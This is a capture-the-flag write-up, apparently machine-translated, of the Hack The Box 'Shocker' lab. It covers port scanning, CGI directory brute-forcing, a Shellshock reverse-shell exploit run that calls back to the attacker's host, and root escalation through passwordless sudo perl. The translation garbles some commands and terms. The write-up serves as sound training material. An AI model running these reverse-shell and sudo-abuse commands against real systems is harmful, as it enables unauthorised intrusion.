disclaimer

The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.

Service to detect

Chrysene ─(root💀kali)-[~/ HTB /Shocker] ├ ─# nmap-SV -pn 10.10.10.56 -p-host discovery disabled (-pn). All addresses will be Starting Nmap 7.91 (https://nmap.org) at 2021-11-30 01:58 EST Nmap scan marked 'up' and scan times will be slower Report for 10.10.10.56 Host is up (0.35s latency). Not shown: 65533 Closed Ports PORT STATE SERVICE VERSION 80/ TCP open HTTP Apache HTTPD 2.4.18 ((Ubuntu)) 2222/ TCP open SSH OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; Protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) Scanned in 1015.68 secondsCopy the code

Port 80 opens with a simple page

Directory of blasting

─ ─ (root 💀 kali) - ~ / dirsearch └ ─ # python3 dirsearch. Py - e * t - 100 - u _ | http://10.10.10.56. _ _ _ _ _ _ | _ v0.4.2 (_ | | | _)  (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492 Output File: / root/dirsearch/reports / 10.10.10.56 / _21-30 _02-11-12-39. TXT the Error Log: / root/dirsearch _02 / logs/errors - 21-11-30-12-39. The log Target: http://10.10.10.56/ [02:12:41] Starting: [02:14:06] 200 - 137B - /index.htmlCopy the code

There is only one static page, which is a bit depressing

Let’s try a more powerful dictionary:

Chrysene - (root💀kali)-[~/dirsearch] # python3 dirsearch.py -e* -t 100 -u http://10.10.10.56 -w The/usr/share/wordlists/Web Content/directory - the list - 2.3 - medium. TXT _ |. _ _ _ _ _ _ | _ v0.4.2 (_ | | | _) (/ _ (_ | | (_ |) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545 Output File: / root/dirsearch/reports / 10.10.10.56 _21-11-12-30 _02 18-19. TXT the Error Log: / root/dirsearch _02 / logs/errors - 21-11-30-19-12. The log Target: http://10.10.10.56/ [02:19:12] Starting: [02:31:53] 403 - 299B - /cgi-bin/ Task CompletedCopy the code

There is only one cgi-bin folder, and we use gobuster, specifying the.php,.sh,.html extensions to blow it up

└ ─ # gobuster dir - url http://10.10.10.56/cgi-bin/ - w/usr/share/wordlists/dirb/common TXT 30 - x - t. PHP,. Sh,. 1 ⨯ HTML = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = Gobuster v3.1.0 by OJ Reeves (@ TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.56/cgi-bin/ [+] Method: GET [+] Threads: 30 [+] Wordlist: The/usr/share/wordlists/dirb/common TXT [+] Negative Status codes: 404 [+] User Agent: gobuster / 3.1.0 [+] Extensions: sh,html,php [+] Timeout: 10s =============================================================== 2021/11/30 05:45:13 Starting gobuster in directory enumeration mode =============================================================== /.htpasswd.html (Status: 403) [Size: 308] /.hta.php (Status: 403) [Size: 302] /.htaccess (Status: 403) [Size: 303] /.htpasswd (Status: 403) [Size: 303] /.hta.sh (Status: 403) [Size: 301] /.htaccess.php (Status: 403) [Size: 307] /.htaccess.sh (Status: 403) [Size: 306] /.hta.html (Status: 403) [Size: 303] /.htpasswd.php (Status: 403) [Size: 307] /.hta (Status: 403) [Size: 298] /.htpasswd.sh (Status: 403) [Size: 306] /.htaccess.html (Status: 403) [Size: 308] /user.sh (Status: 200) [Size: 118] =============================================================== 2021/11/30 05:48:46 Finished = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =Copy the code

A user. Sh file was found

This file cannot be accessed on a browser, but can be returned with the curl command

┌ ─ ─ (root 💀 kali) - ~ / HTB/Shocker └ ─ # curl - s http://10.10.10.56/cgi-bin/user.sh the content-type: Text /plain Just an uptime test script 05:48:43 UP 3:52, 0 Users, Load Average: 0.01, 0.03, 0.00Copy the code

Use Nikto to mine the script for potential vulnerability information

┌ ─ ─ (root 💀 kali) - ~ / HTB/Shocker └ ─ # nikto - h - http://10.10.10.56/cgi-bin/user.sh nikto v2.1.6 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + Target IP: 10.10.10.56 + Target Hostname: 10.10.10.56 + Target Port: 80 + Start Time: 2021-11-30 05:53:13 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking x-frame-options header is not present. + The X-xss-protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME Type + No CGI Directories found (use '-c all' to force check all possible dirs) + Apache/2.4.18 appears to be outdated (Current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch '93e4r0-cve-2014-6271' found, with contents: true + Uncommon header '93e4r0-cve-2014-6278' found, with contents: true + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /cgi-bin/user.sh/kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php + /cgi-bin/user.sh/lists/admin/: PHPList Pre 2.6.4 Contains a number of December including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist + /cgi-bin/user.sh/splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely. + /cgi-bin/user.sh/ssdefs/: Siteseed pre 1.4.2 has 'major' security problems. + /cgi-bin/user.sh/sshome/: Siteseed pre 1.4.2 has 'major' security problems. + /cgi-bin/user.sh/tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin + /cgi-bin/user.sh/tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/adminCopy the code

Version 2.4.18 appears to have cVE-2014-6271 and CVE-2014-6278 vulnerabilities

We found this script

Copy exp to local and execute the attack

Python exp. Py payload=reverse rhost=10.10.10.56 lhost=10.10.14.15 lport=4242 pages=”/cgi-bin/user.sh”

Get the initial shell

Chrysene ─(root💀kali)-[~/ HTB /Shocker] ├ ─# python exp. Py payload=reverse rhost= 10.10.10.56lhost = 10.10.14.15lport = 462 Pages = "/ cgi - bin/user. Sh" 1 ⨯ [!]  Started reverse shell handler [-] Trying exploit on : /cgi-bin/user.sh [!]  Successfully exploited [!] Incoming connection from 10.10.10.56 10.10.10.56> ID UID =1000(Shelly) GID =1000(shelly) Groups = 1000 (shelly), 4 (adm), 24 (cdrom), 30 (dip), 46 (plugdev), 110 (LXD), 115 (lpadmin), 116 (sambashare) 10.10.10.56 > whoami shellyCopy the code

Get user.txt in the home directory

Right to mention

See sudo privileges to use Perl without a password

10.10.10.56> sudo-l Matching Defaults entries for Shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perlCopy the code

Leverage perl to root

10.10.10.56> sudo perl -e 'exec "/bin/sh";'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)

10.10.10.56> whoami
root

Copy the code